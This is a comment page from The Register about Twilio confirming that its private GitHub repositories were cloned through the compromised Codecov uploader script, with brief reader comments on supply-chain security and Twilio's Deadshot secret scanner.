back to article Twilio's private GitHub repositories cloned by Codecov attacker, cloud comms platform confirms

Cloud comms platform Twilio has confirmed its private GitHub repositories were cloned after it became the latest casualty of the compromised credential-stealing Codecov script. Codecov, a cloud-based tool for assessing how much code is covered by software tests, revealed last month that a script called Bash Uploader had been …

  1. 142

    Jesus H...

    See title.

  2. yetanotheraoc

    notable aspect

    "A notable aspect of Twilio's report is what it says under the heading "What are we doing to prevent similar issues in the future?" The company said it evaluates its suppliers for security, and has developed a service called Deadshot that scans GitHub pull requests to prevent secrets or insecure code being committed to its repository."

    Masterful restraint on the part of the author, Tim Anderson. Notable aspect indeed. I wrote a whole bunch more but then deleted it, because everybody here, unlike Codecov, Twilio, et al, already sees the issue with complete clarity.

  3. HildyJ Silver badge
    Facepalm

    How many times?

    Devs need to realize that securing inputs is not just about preventing malicious data from entering their app.

    The way Linux ecosystem is set up, the security has to extend to preventing malicious code from coming in via third party apps that you use to build your app.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2021